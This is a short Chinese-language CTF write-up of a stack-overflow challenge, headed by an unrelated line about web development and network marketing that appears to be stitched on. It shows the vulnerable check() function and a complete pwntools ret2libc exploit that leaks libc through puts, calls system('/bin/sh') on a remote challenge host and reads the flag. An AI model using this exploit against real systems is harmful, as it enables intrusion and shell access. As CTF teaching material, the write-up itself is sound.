网站开发 卡片/网络营销的方法有哪些?举例说明

第二题是个栈溢出的题，也属于白送的那种，程序直接调用check在check里向48字节的空间写入0x400，导致栈溢出。而且没有canary没开pie这样就能直接通过溢出

int check()
{char buf[48]; // [rsp+0h] [rbp-30h] BYREFread(0, buf, 0x400uLL);return strcmp(buf, "21232F297A57A5A743894A0E4A801FC3");
}

思路就是先通过溢出调用puts(got[puts]),start回来再调用system(/bin/sh)

from pwn import *local = 0
if local == 1:p = process('./pwn')
else:p = remote('www.bmzclub.cn', 21355) libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830elf = ELF('./pwn')
context(arch = 'amd64', log_level = 'debug') #pop_rdi = 0x0000000000400833 # pop rdi ; ret
payload = b'A'*(0x30+8)+ flat(pop_rdi, elf.got['puts'], elf.plt['puts'], elf.sym['_start'])
p.sendlineafter(b"Who are you?\n", payload)libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - libc_elf.sym['puts']
libc_elf.address = libc_base
print('libc:', hex(libc_base))payload = b'A'*(0x30+8)+ flat(pop_rdi, next(libc_elf.search(b'/bin/sh')), libc_elf.sym['system'])
p.sendlineafter(b"Who are you?\n", payload)p.sendline(b'cat /flag')
p.interactive()